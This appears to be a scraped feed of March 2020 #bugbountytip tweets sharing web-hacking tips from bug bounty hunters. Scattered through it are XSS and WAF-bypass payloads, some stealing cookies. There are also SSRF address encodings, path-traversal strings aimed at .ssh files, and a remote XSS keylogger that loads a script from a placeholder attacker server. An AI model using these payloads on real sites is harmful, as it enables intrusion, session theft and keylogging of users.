4 When fuzzing APIs w/ GET they may return "405 Method Not Allowed" but not always. Fuzz APIs w/ @Burp_Suite Intruder using Cluster bomb attack (config shown in the screenshots) to pick up actions over diff. HTTP methods. #burpsuitetip #bugbountytip https://t.co/coMFhgGe8t
SI9INT
@si9int


2020-03-16 19:22:32
0 This one helped me recently to bypass a custom #XSS filter! #infosec #bugbounty #bugbountytip https://t.co/UYXlQbkLGK
srinivas_Uneek
@UneekVivek


2020-03-16 16:19:39
0 #Bugbountytip. Remember if u Dint Succeed in Finding Vulnerability in webapp try to find in its api. like idor, info disclosure.
Mohammed Shine
@MohammedShine8


2020-03-16 16:16:24
0 Use the command 'tee' to see and save the output file at the same time. Eg: nmap 127.0.0.1 | tee -a output.txt dirsearch -u https://t.co/z4XPhGdw4j -e php | tee -a output.txt #BugBounty #bugbountytip #linuxtip #Pentesting
Hussein Daher
@HusseiN98D


2020-03-16 13:49:33
0 #Bugbountytip Read the documentation and try to craft the requests when you don't have access to the Web Gui https://t.co/KB4NAIvBOO
Life Pro Tips
@Life_P_Tips


2020-03-16 07:41:06
0 RT @securibee: "The best time to plant a tree is twenty years ago. The second best time is now." #BugBountyTip #TogetherWeRise #covid19 #lifeprotips
Raju Kumar
@MrCyberwarrior


2020-03-16 05:45:23
0 Email verification bypass 1. Log in with Facebook does not have an email. 2.The site asks for an email to join. Enter someone else email. 3. There was no validation at serverside to verify email at this point. Account successfully registered with the provided email. #Bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-03-16 03:41:33
1 #bugbountytip So at auth, convert the POST request intoย JSONย orย XMLย format, Sometime dev leave them open and these not protected fromย injections and if XML comes into play then try XXE @ShauryaSharma05 have nice stuff, Keep it up bruh๐Ÿค˜ #bugbounty #bugbountytip https://t.co/kN17dVSIou
Ankit Joshi
@ankit_2812


2020-03-16 02:07:58
3 SSRF's to bypass WAF http://โ‘ฏโ‘จใ€‚โ‘กโ‘คโ‘ฃใ€‚โ‘ฏโ‘จ๏ฝกโ‘กโ‘คโ‘ฃ/ http://โ“ชโ“งโ“โ‘จ๏ฝกโ“ชโ“งโ“•โ“”๏ฝกโ“ชโ“งโ“โ‘จ๏ฝกโ“ชโ“งโ“•โ“”:80/ http://โ‘กโ‘งโ‘คโ‘กโ“ชโ‘ขโ‘จโ‘ โ‘ฅโ‘ฅ:80/ http://โ‘ฃโ‘กโ‘ค๏ฝกโ‘คโ‘ โ“ช๏ฝกโ‘ฃโ‘กโ‘ค๏ฝกโ‘คโ‘ โ“ช:80/ http://โ“ชโ‘กโ‘คโ‘ ใ€‚โ“ชโ‘ขโ‘ฆโ‘ฅใ€‚โ“ชโ‘กโ‘คโ‘ ใ€‚โ“ชโ‘ขโ‘ฆโ‘ฅ #bugbountytip #bugbountytips #BugBounty #hacking
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-15 21:52:36
3 my own ebook library contain hundreds (661) of hacking books and computer science books,i love reading and reading again and again.feel free to ask me about the best hacking books #Hacking #Pentesting #redteam #bugbountytip #Malware #CyberSecurity https://t.co/lToSzekl5z
The Notorious B.E.E. ๐Ÿ
@securibee


2020-03-15 16:55:31
0 "The best time to plant a tree is twenty years ago. The second best time is now." #BugBountyTip #TogetherWeRise #covid19 #lifeprotips
ghostlulz
@ghostlulz1337


2020-03-15 16:43:06
0 Self isolated? Nows a great time to learn how you can make money doing Bug Bounties from home. Get your copy today! https://t.co/zJFRZjg5q2 #bugbountytips #bugbountytip #BugBounty #redteam #caronavirus #redteam #Pentesting #infosec #appsec #xss #dfir #cyber #security https://t.co/uOlw1xqXa6
Hussein Daher
@HusseiN98D


2020-03-15 16:31:05
13 #Bugbountytip : If you do automated tasks on a website and you need to stay logged in, you can use "Tab Auto Refresh" extension on Firefox which will refresh the tab each minute or so. This helps with using tools like SQLmap when session gets expired.
Godsky
@me_godsky


2020-03-15 14:24:43
0 This is really really helpful for noobs, summed it well๐Ÿ‘๐Ÿ‘, going to start bug bounty hunting after completing fortress on HTB. Let's see how much it takes to find my first valid bug :))) #BugBounty #bugbountytips #bugbountytip #hacking #cybersecurity #togetherwehitharder https://t.co/ye1gm2GOIz
refvd_Fvt
@refvdfvt


2020-03-15 14:12:46
0 hackers, what does it means when it returns : null in smuggling attack based , And thanks in advanse ;) @Hacker0x01 @PortSwiggerRes #BugBounty #bugbountytips #bugbountytip https://t.co/uM1MDUzyNI
Arif Khan
@payloadartist


2020-03-15 12:25:17
2 https://t.co/f0fBsHJepH is great if you got an SSRF payload firing months after! #bugbounty #bugbountytip
Ashish Jha
@_ashish_jha


2020-03-15 06:27:59
1 I've got an gitlab Docker login token which is working! What more can I do? #BugBounty #bugbountytip #Pentesting
Eduard Tolosa
@Edu4rdSHL


2020-03-15 06:19:03
4 I just have added Findomain Plus information in top of the Findomain's README. Open the following link to see differences vs free version, how to get it, screenshots and demos. https://t.co/4JhwsMna0p #BugBounty #Subdomains #Monitoring #Hacking #bugbountytip #tools #osint
Shubham Sharma
@Shubham_pen


2020-03-15 02:09:47
8 Many teams consider the use of Web Application Firewalls (WAFs) as a best practice or a compliance requirement when implementing web applications @rajchandel @Medium #cybersecurity #bugbountytip #infosec #linux #aws #firewall #SundayMotivation #ITSecurity https://t.co/34qRlkZiNU
Andri Wahyudi ๐Ÿ‘พ
@andripwn


2020-03-14 20:32:18
0 Object injection on http header. You can use phpgcc for rce https://t.co/b2BTOY2TQx #bugbounty #bugbountytip #bugbountytips https://t.co/JLQoG8Ypio
Hassan Khan
@iamMR_HAK


2020-03-14 19:13:08
1 Hacking for Beginners: File Upload Vulnerability Basic https://t.co/aVIhHxcTaY #BugBounty #bugbountytip #hackerone
Ultra Security
@Ultra__Security


2020-03-14 17:06:43
0 Discovered Cross Site Scripting ( XSS ) Vulnerability in https://t.co/hyzW1ilEXp. For more information about this vulnerability use the link below. https://t.co/ADP6ZW7LyA #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/xBZYAi5zzC
bb00x
@ihebhamad514


2020-03-14 16:04:06
0 brute force all the gathered param names both (GET/POST) requests (use them in all location of the webapp)and see every response to identifie what of these params are valid. (2/2) #bugbounty #bugbountytips #bugbountytip #bughunting #hackerone
Katie Paxton-Fear
@InsiderPhD


2020-03-14 16:00:00
14 New video ๐Ÿ˜Š This week we're doing a whirlwind tour of XSS, and covering every type of XSS attack, from stored to self. Answering questions like: What is blind XSS, why is it different? How do you even cause a DOM XSS? #BugBounty #bugbountytip #infosec https://t.co/qsuRO0P62l https://t.co/oDrDzlWgFJ
Aly_Inj3ctor
@AlishahMughal12


2020-03-14 15:52:03
0 Drop endpoints to look for while recon Thanks :) #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-03-14 14:25:30
1 You can bypass mysql_escape_string() using BIG5 encoding. Will not work everytime, encoding misconfig is needed. #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-03-14 14:23:21
1 #bugbountyCOMMUNITY Just Share Any Random One Tip/Trick If you will share, others will share and everyone will learn something new #TogetherWeHitHarder #ItTakesACrowd Can you guys share? @Hacker0x01 @Bugcrowd @Intigriti #YourNextBugTip #bugbounty #bugbountytips #bugbountytip
Hassan Khan
@iamMR_HAK


2020-03-14 11:46:31
0 Master in Wi-Fi ethical Hacking https://t.co/dJUgNR8ad8 #BugBounty #bugbountytip #Hacking
Luigino De Togni
@lewixlabs


2020-03-14 10:23:48
0 ok solved. Both on Android and iOS app, login doesn't work if you digit your credentials just app started. You must open app without account (limited use) and you must go on adult section to fill account form. #bugbountytip
'--+-
@mohsink83789226


2020-03-14 05:33:10
1 you can only allowed to find 3 bug. so what you will find? me 1. IDOR 2. File upload 3. XSS #BugBounty #bugbountytip #BugBountyTales @stokfredrik @thedawgyg @Jhaddix
Your Next Bug Tip
@YourNextBugTip


2020-03-14 04:58:36
1 To bypass old password check You JUST need to change parameter's name from pw -> pw[] ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Gr8 Bypass by Green catz (hoangn144) https://t.co/2qAkONJaEV [If u knw him, plz Tag his twitter account] #bugbountytips #bugbountytip #bugbounty https://t.co/KcMT8upEvS
Sofiane Hamlaoui ๐Ÿ‡ฉ๐Ÿ‡ฟ
@S0fianeHamlaoui


2020-03-13 21:11:39
4 Follow @CyberSecCare to get all Security/Cyber Security related tweets. A bot that retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Ismayil Tahmazov
@Tismayil1


2020-03-13 17:29:39
2 Yes I was awarded with $500 private bug bounty program. Bug Stored XSS. #BugBounty #bugbountytip #bugbountytips #whitehat https://t.co/8C0BjAUqiI
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-13 16:58:10
1 #ProTip don't buy hacking books that hold this title: (**** kalilinux) beacuse it is useles: -1-it's far far away from real world attacks -2-everything is happening in a lab (DVWA) -4-not talking about what's happening behind the scenes or how to evade firewalls #bugbountytip
jineesh
@Jin33sh4k


2020-03-13 16:42:40
1 Came across a interesting finding today, Mass assignment : admin account access #bugbountytip https://t.co/bnByXYiAxN
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-13 16:06:05
10 5 Subdomain Takeover #ProTips.pdf: https://t.co/nzruzjfRPX Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf: https://t.co/HjB6Q1oWOo Phishing With a Rogue Wi-Fi Access Point.pdf https://t.co/n0sgNy37Vc #bugbountytip #Hacking #OSINT #pentest
Grzegorz Niedziela
@gregxsunday


2020-03-13 13:58:21
1 This, ladies and gentlemen, is how a @Hacker0x01 report should be written. https://t.co/sYq1qhUIWC #bugbountytip #bugbountytips
Ultra Security
@Ultra__Security


2020-03-13 10:29:04
0 Discovered Cross Site Scripting ( XSS ) Vulnerability in https://t.co/wSDCfgslz6 . For more information about this vulnerability use the link below. https://t.co/gZGK7CyjaF #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/8rusM7UXp4
Ultra Security
@Ultra__Security


2020-03-13 09:52:52
0 Discovered Cross Site Scripting (XSS) Vulnerability in https://t.co/kNI3i1RVzb. For more information about this vulnerability use the link below. https://t.co/OmtqHCt8Z0 #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/ASpLTmhgVO
Shubham Sharma
@Shubham_pen


2020-03-13 03:44:30
4 AWS traffic mirroring is a feature introduced by Amazon Web Services (AWS) on June 25th, 2019. After the release, Mike LoSapio of Palantir identified that it might pose a risk. #infosec #CyberSecurity #BugBountyTip #pentest #AWS #linux #FridayMotivation https://t.co/ol6dq70H4j
Keshav Malik
@g0t_rOoT_


2020-03-12 20:10:40
0 What's the best possible way to exploit a Comment Box in a Web Application !? Any suggestions @stokfredrik ..!? #bugbountytip #Hackers #bugbountytips #Pentesting #webapplication
the-amazing-ferret
@ferret_amazing


2020-03-12 19:29:36
0 Check out my take on #xss attacks in 2020. https://t.co/5vpR3bqAAI #bugbountytips #bugbountytip
Keshav Malik
@g0t_rOoT_


2020-03-12 19:23:27
0 What's the best possible way to exploit a Comment Box in a Web Application !? #bugbountytip #Hackers #bugbountytips #Pentesting #webapplication
Michele Romano
@Mik317_


2020-03-12 19:03:24
8 #bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(โ€˜XSSโ€™);%uff1c/script%uff1e payload ;)
Julien Ahrens
@MrTuxracer


2020-03-12 17:29:50
20 During my interview with @NahamSec I've shared a very handy #BugBountyTip for wide-scope #BugBounty programs: Look for Google Analytics Tracking IDs (UA-XXXXXX-X) and use i.e. https://t.co/2dTg4vV9it to discover more assets sharing the same ID.
Your Next Bug Tip
@YourNextBugTip


2020-03-12 17:03:59
12 So it is POSSIBLE, You Can Bypass PUT method (CSRF) #bugbountytip POST /url/xyz?_method=PUT B0000M CSRF Bypass Awesome CSRF Bypass by Simgamsetti Manikanta https://t.co/Xt2F0hEDDa [Tag his twitter handle as handle] MUST READ https://t.co/pSql6cqbDy #bugbountytips #bugbounty https://t.co/MHk13MKmZQ
Andri Wahyudi ๐Ÿ‘พ
@andripwn


2020-03-12 16:39:36
0 Thank's you guys for (5,86k subscriber) https://t.co/MbCvnM7jh7 Keep hunt ~ have a nice days #bugbounty #bugbountytip #bugbountytips #poc
'--+-
@mohsink83789226


2020-03-12 11:38:52
2 Found 4 bug rewarded 20 point ๐Ÿค•๐Ÿ‘‡ #bugbounty #bugbountytips #cybersecurity #bugbountytip https://t.co/aggig1nqBI
Mourad
@SecuAudit


2020-03-12 10:47:34
1 When you choose the easiest programs , Don't expect so much from it #BugBounty #bugbountytips #bugbountytip https://t.co/gDmDaf9Lcd
Your Next Bug Tip
@YourNextBugTip


2020-03-12 07:40:00
4 #bugbountyBEGINNERS If you are creating your own scripts then you can use @Naategh_'s github repo (PyCk) for ideas. This repo contains basic pentest scripts. Specially created for #bugbountyBEGINNERS #bugbounty #bugbountytips #bugbountytip https://t.co/TRNpeuTmw9
the-amazing-ferret
@ferret_amazing


2020-03-12 06:46:39
0 #bugbountytip Try calling the js functions from the developer console. Sometimes developers just hide the buttons if you have no rights to do an action, but forget to check it server sided.
Chevon Phillip
@chevonphillip


2020-03-12 05:07:12
2 I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Hereโ€™s a tip. Wayback -> https://t.co/MBp16EYObF -> grep | .php?id= and win ๐Ÿ˜ #bugbountytip #bugbounty
GokhanGK
@gkhck_


2020-03-12 02:33:50
1 Follow @brutelogic for amazing waf bypass tips. #bugbountytips #bugbountytip #infosec https://t.co/v0OyBJBMF8
Secuna
@SecunaSecurity


2020-03-12 02:03:53
0 Wanna earn more bounties? Then learn more about File Inclusion. On this blog, we demonstrated the differences between Local and Remote File Inclusion. https://t.co/1h76ft3qKB #BugBounty #BugBountyTip #SecurityFirst #Cybersecurity
alert(Y000!)
@_Y000_


2020-03-11 23:17:46
3 Payload HTML-XSS inyection <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee> <marquee loop=1 width=0 onfinish=pr\u006fmpt("xss_by_Y000")>Y000</marquee> #payloads #payload #cybersecurity #infosec #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-03-11 22:47:45
3 Path traversal- LFI tools and payloads collection:- https://t.co/MDU73pwpIs https://t.co/3wz6YE7MyZ https://t.co/fabTJqgavZ https://t.co/72mloQcb8i https://t.co/n4b63VqltB https://t.co/UyO45CKpyQ #bugbountytip #bugbounty https://t.co/ppczzATiWu
Kanishk
@kanishkT23


2020-03-11 20:56:03
0 A bug in Avast AntiTrack privacy software allowed MITM attack on HTTPS traffic. https://t.co/dIvt064R8J . #MITM #Cyberattack #Vulnerability #Avast #Security #TLS #Authentication #BrowserHijacking #CyberSecurity #dataprivacy #infosec #bugbountytip #Ethicalhacking @sanjaykatkar
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-11 03:45:17
2 NULLCON Puzzle #nullcon2020 ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3tpyvn5N16
Bhavesh Thakur
@Bhavesh_Thakur_


2020-03-10 19:04:49
0 Sometimes blacklisting is really helpful than white listing. Application was expecting an external URL as input. Provided127.0.0.1 & got default webserver page in response. Sent request 127.0.0.1:0-65535 server went down after 120 request. #DOS #critical #bugbountytip
Ameen
@ameenmaali


2020-03-10 18:06:53
8 Little known or talked about fact: EC2 instances on AWS are preconfigured with an /etc/hosts record to point the hostname โ€œinstance-dataโ€ to the metadata service. Would look like: http://instance-data/latest/meta-data/. Likely missed in SSRF blacklists. #bugbounty #bugbountytip
Unde5able
@Unde5able


2020-03-10 16:29:58
3 #RECON SERIES TO FIND SUBDOMAIN: *. https://t.co/1v5l4p2xOW CHECK FOR SCOPE IN TARGET #MORE ATTACK SURFACE. #bugbounty #bugbountytip #infosec #cybersecurity #web #pentesting #unde5able #hacker https://t.co/LnAYHw6bob
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-10 15:28:02
1 if you been wondering what is the best book to learn how to collect info about your targets.whether it is a company,person,website i will recommend this book,very close to real world attacks +discusses a lot of nedded tools.your full guide for #osint #bugbountytip by @vinnytroia https://t.co/ktDgDXwxnj
Shubham Sharma
@Shubham_pen


2020-03-10 15:21:59
1 Spoof SSDP replies and creates fake UPnP devices to phish for credentials and NetNTLM challenge/response. @rajchandel #cybersecurity #bugbountytip #infosec #pentest #ntml #redteam #blueteam #TuesdayMotivation #WednesdayMotivation https://t.co/gKkLkJj6xw
SecHaq
@SecHaq


2020-03-10 14:48:40
2 Does anyone know how to exploit a device token for firebase fcm or access token for salesfoce extract target api.. Can't find any good documentation regarding them #bugbounty #bugbountytip #hackerone #bugcrowd #hacking #hacker
Ashkan
@11xuxx


2020-03-10 11:59:19
0 Bypass CSRF Protection 1. every POST/PUT/PATCH request was protected by X-CSRF-TOKEN in header 2. changed from POST to GET and appended request body to url as request param 3. removed X-CSRF-TOKEN from headers 4. received 200 thus bypassed CSRF protection #bugbountytip
Shahmeer Amir
@Shahmeer_Amir


2020-03-10 07:02:00
0 The most comprehensive sub domain scanner. #bugbountytip #BugBountyTales
Security Executions Code
@pwn0sec


2020-03-09 21:41:18
1 Directory listing bypass payloads : Any file name or folder name ..%3B/ /%20../ /.ssh/authorized_keys /.ssh/known_hosts /%2e%2e/google.com ..%3B///////////////////////////////// Owned by : @Dhamu_offi #bugbountytip #bugbountytips #bypass https://t.co/ilYvwZJZnH
Shubham Sharma
@Shubham_pen


2020-03-09 17:37:32
2 Hi Friends, today we will walk through various HTTP Protocol methods and the tools used to extract those available HTTP methods in a web server. @rajchandel #infosec #cybersecurity #bugbountytip #Https #pentest #linux #MondayMotivaton #TuesdayThoughts https://t.co/kvvxRGpJbR
Michele Romano
@Mik317_


2020-03-09 17:32:42
1 Trying to figure out how works a regex? Go on https://t.co/2NKrl1LVJt ;) #bugbountytip https://t.co/aNvULoZ1qM
sw33tLie
@sw33tLie


2020-03-09 16:05:38
0 Now you only have to add them to your httprobe command with -p http(s):port_number. This method is much better than just adding random ports hoping to find something... (2/2) #bugbountytip #BugBounty
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-09 15:46:57
0 Cross Site Scripting Basics - #XSS https://t.co/pGFIGWCsM7ย  Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/7vInhGt6uvย โ€ฆ Subscribe to Youtube Chanel for Free Tutorials https://t.co/WEmewhqP8Rย โ€ฆ #BugBounty #BugBountyTip #bugbountytips #penetr
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-09 12:49:41
3 Apache OFBiz has an #unauthenticated reflected #XSS, named CVE-2020-1943. PoC: http(s)://target.com/catalog/control/stream?contentId=<img/src/onerror=alert("XSS")> The path /catalog/ can also be replaced by /content/ or /partymgr/. #bugbounty #bugbountytip #infosec
Sudoka
@sudo_sudoka


2020-03-09 12:21:44
1 Apache OFBiz has an #unauthenticated reflected #XSS, named CVE-2020-1943. PoC: http(s)://target.com/catalog/control/stream?contentId=<img/src/onerror=alert("XSS")> The path /catalog/ can also be replaced by /content/ or /partymgr/. #bugbounty #bugbountytip #infosec
Your Next Bug Tip
@YourNextBugTip


2020-03-09 12:20:21
4 For #bugbountyBEGINNERS Bug are out there, Just Keep Digging... $$$$ by using shodan Hunt by @fatratfatrat (Vijaysimha Reddy Bathini) BTW waiting for "Tale of Account Takeovers (Part-2)" @fatratfatrat #bugbountytips #bugbountytip #bugbounty https://t.co/40L3uHAB0r
Alfon SeguridadRedes
@seguridadyredes


2020-03-09 08:06:42
1 #bugbountytip #bugbounty Directory listing bypass payloads https://t.co/wR6m4OMfVY
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-03-09 05:52:58
3 โœฏ Cloudfront โ–น $XSS bypass detection, point shot. $xssone โ–ธ ">'><details/open/ontoggle=confirm('XSS')> โŒ $xsstwo โ–ธ 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ โŒ $xssthr โ–ธ "><img src=x onerror=confirm(1);> โŒ #BugBounty #BugBountyTip #WAF #infosec
jdksec
@jdksec


2020-03-09 05:48:16
2 Nmap oneliner to give you a clean list of host:port:version: #> mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../ #bugbountytip #BugBounty https://t.co/PpRhQvTcUF
Shady
@Shady07090477


2020-03-09 04:26:44
0 Hello guys new to #hacking and learning XSS now i've solved two to three labs and i've that cheat sheet from GitHub is there any tip or write up which are different if there is please comment it would help me! Thanx #bugbountytips #bugbountytip #bugbounty
Shubham Sharma
@Shubham_pen


2020-03-09 04:01:51
4 In this article, we are going to describe the utility of the BITSAdmin tool and how vital it is in Windows Penetration Testing. @rajchandel @windowsdev #cybersecurity #bugbountytip #infosec #pentest #bitsadmin #ITSecurity #MondayMotivaton https://t.co/b3pV7RSzTu
AkaaZaan
@AkaaZaan


2020-03-09 03:20:18
0 Need some more ideas to try at Arbitrary file upload vulnerability? #bugbountytip
Daher Mohamed
@DaherMohamed4


2020-03-08 23:31:41
3 5 min P1 #BugBounty #BugBountyTips #BugBountyTip https://t.co/yxEew8bviU
LISSANON Cรฉdric
@LissanonCedric


2020-03-08 20:29:10
0 I learned : try to stop #redirection on role page (#admin page) #sqli #bugbountytip https://t.co/cNNBBn8Ger
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-03-08 13:36:20
3 ยซ HTML "๐Ÿ’ต" text, `XSSยด payload. ยป โœฎ <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">@spyerror</button> โœฎ #BugBounty #BugBountyTip #WAF #infosec
Michele Romano
@Mik317_


2020-03-08 10:05:57
1 #bugbountytip Searching for CVEs?? Use https://t.co/QIkKy2FiKs , Git and ... Gist. You'll find every thing you need ;)
Your Next Bug Tip
@YourNextBugTip


2020-03-08 07:46:46
2 #bugbountyHUNTERS Do you know that an infinite redirect loop cost $100?๐Ÿ˜ฒ @D0rkerDevil (Ashish Kunwar) ^He knows Read Here (2 min read) https://t.co/3xgWOMYEEu #bugbountytips #bugbountytip #bugbounty
Dhamu
@Dhamu_offi


2020-03-08 06:31:42
4 #bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/ /%20../ /.ssh/authorized_keys /.ssh/known_hosts /%2e%2e/google.com ..%3B///////////////////////////////// https://t.co/QhSkSflb1k
Dhamu
@Dhamu_offi


2020-03-08 06:11:59
0 #bugbountytip #bugbounty Pulse Secure VPN Exploitation #nullcon2020 #Owaspseasides [SLIDES] https://t.co/nX7GOLcC9m https://t.co/PxeWP6hz1w
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-08 06:01:58
2 OPEN REDIRECT: simply changing the ta_redirect parameter to an external site would redirect the user to an external site controlled by the attacker: https://t.co/1J9SnT5Uvx SHOPIFY OPEN REDIRECT: #bugbounty:report๐Ÿ‘‡ https://t.co/1Vhl7NzBw7 #bugbountytip #Hacking #pentest
Unde5able
@Unde5able


2020-03-08 04:38:09
0 ๐ŸคกPRACTICE HACK ON LABS ENVIRONMENT .๐Ÿคก Follow me @Unde5able on insta & twitter #bugbountytip #bugbounty #bughunter #infosec #bugbountytips #hacking2020 #unde5able https://t.co/dZxW6fT38t
Unde5able
@Unde5able


2020-03-08 04:34:30
0 WHERE TO HUNTS BUGS? -BUG BOUNTY PLATFORMS:there are so many,some are listed below Follow me @Unde5able on insta & twitter #bugbountytip #bugbounty #HackerOne #bugcrowd #hacking #hacking2020 https://t.co/3lgpOsijoq
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-08 03:29:40
1 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/Hd3CFrclqD
Your Next Bug Tip
@YourNextBugTip


2020-03-07 17:17:38
8 Admin Acc Takeover using `ฤฑ` instead of `i` POC ---- Create Acc [email protected]ฤฑn on https://t.co/3rxqp3ajJl Reset Pwd LInk & change pwd Boom, [email protected] [Real Admin]'s pwd changed BADASS Bypass by @ShauryaSharma05 #bugbountytips #bugbountytip #bugbounty https://t.co/cbBW7AOJLU
an0malous
@an0malous_


2020-03-07 15:43:27
0 I wanted to see if I could get some opinions on whether people prefer VPN or a VPS for doing reconnaissance for bug bounties. Is there a benefit to one vs the other? #bugbounty #bugbountytip #bugbountytips
Zarcolio
@zarcolio


2020-03-07 09:34:30
2 Web applications hacker's Handbook Extras https://t.co/is6alAQJiF #bugbountytip
ส•โ€ขฬซอกโ€ขส•โ€ขฬซอกโ€ขส”un4giส•โ€ขฬซอกโ€ขส”โ€ขฬซอกโ€ขส”
@un4gii


2020-03-07 06:18:51
0 Google dork for /_layouts/15/ -> likely candidate for CVE-2019-0604 -> get that RCE #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2020-03-06 23:50:40
0 #ATO #InsufficientSessionExpiration #PrivEsc #BugBountyTip Try to elevate privileges or account takeover... While logged-in with an Admin user, open new tab and begin the process to create another administrator, in the first tab do a log-off... 1/n
Rafin Rahman Chy
@rafinrahmanchy


2020-03-06 20:19:57
4 Wow! OTP bypass with parameter tampering! https://t.co/tC4wpVCL69 #BugBounty #bugbountytip #bugbountytips #WebSecurity #websec #AppSec #netsec #pentest #Pentesting #Exploit #EthicalHacking #Hacking #Hacker #Hackers #Vulnerability #CyberSecurity #InfoSec #infosecurity #ITSecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-06 17:16:16
2 #hackdoor stickers and #swag comming to #nullcon ! Follow Us To Get the Swag ! ๐Ÿ‘‡๐Ÿ‘‡ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #devops #devsecops https://t.co/7UQx8EVA80
R M
@kingthorin_rm


2020-03-06 16:52:46
1 Have XSS and need a redirect? Try: alert(window.location='https://t.co/7NZHkvqxIJ'); Together we hit harder. #BugBountyTip
Kyle
@B3nac


2020-03-06 16:20:01
1 @Alyhamza_fit @Bugcrowd Good luck and have fun ๐Ÿ™‚ Look for deeplinks that don't have android:autoVerify="true" specified in the manifest. These take the user directly to the resource without a prompt. #bugbountytip
Adam Langley
@adamtlangley


2020-03-06 15:10:23
2 If you're interested in practising your #bugbounty webapp #hacking skills on realistic CTF's including recon, CSRF, subdomain takeover, injection and much more give https://t.co/13ucD5B0eb a try #bugbountytip
thehackerish
@thehackerish


2020-03-06 14:27:13
0 An app is as secure as its weakest component โ›“๏ธ. Learn how to attack and mitigate it. Many #bugbountytip along the way ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/8Zq21nfM9f
Hussein Daher
@HusseiN98D


2020-03-06 10:56:33
1 If you're searching for a specific tool for #bugbounty, write what the tool must do and if the tool already exists someone will comment out the name. #pentest #bugbountytip #bugbountytips
Adnan Malik
@infoadnanmalik


2020-03-06 09:09:19
1 There is no rate limit to 'Verification of Number' on target. But cloudfront is restricting the IP after some hundreds of request which is reducing the attack surface! Anyway to play with it? @_jensec @HusseiN98D #bugbountytips #infosec #bugbountytip
Security Executions Code
@pwn0sec


2020-03-05 16:39:23
0 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/PswYgAhPRs #SQL_Injection #wordpress #bugbountytips #bugbountytip #penetrationtesting https://t.co/WVzpDvTAms
Security Executions Code
@pwn0sec


2020-03-05 16:30:39
4 Pwned @andripwn - Bypassing WAF XSS with language /></noscript></form><script language="javascript">window.alert(1)('document.forms[0].submit()', 0);</script></body></html> #xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting https://t.co/3fJmM9uTLO
Naategh
@Naategh_


2020-03-05 16:08:21
0 That's what I wanted really to simply hunt IDORs! Firefox Containers! https://t.co/jlTKM9DbuL #bugbounty #bugbountytip
Kanika
@kanika_enc


2020-03-05 13:59:53
1 Brute forcing an iOS app using frida script for finding the correct pin Cool things that happened in iOS app hacking training by @enciphers_ #MobileSecurity #iOS #cybersecurity #infosec #CyberSec #appsec #bugbounty #pentest #Pentesting #ethicalhacking #cyber #bugbountytip https://t.co/L3XNnT7WUy
Israel Thomas
@IsraelThomas_7


2020-03-05 12:40:19
0 #bugbountytip I love Data scientists and ML engineers. You'll know what I mean ๐Ÿ˜‹
Your Next Bug Tip
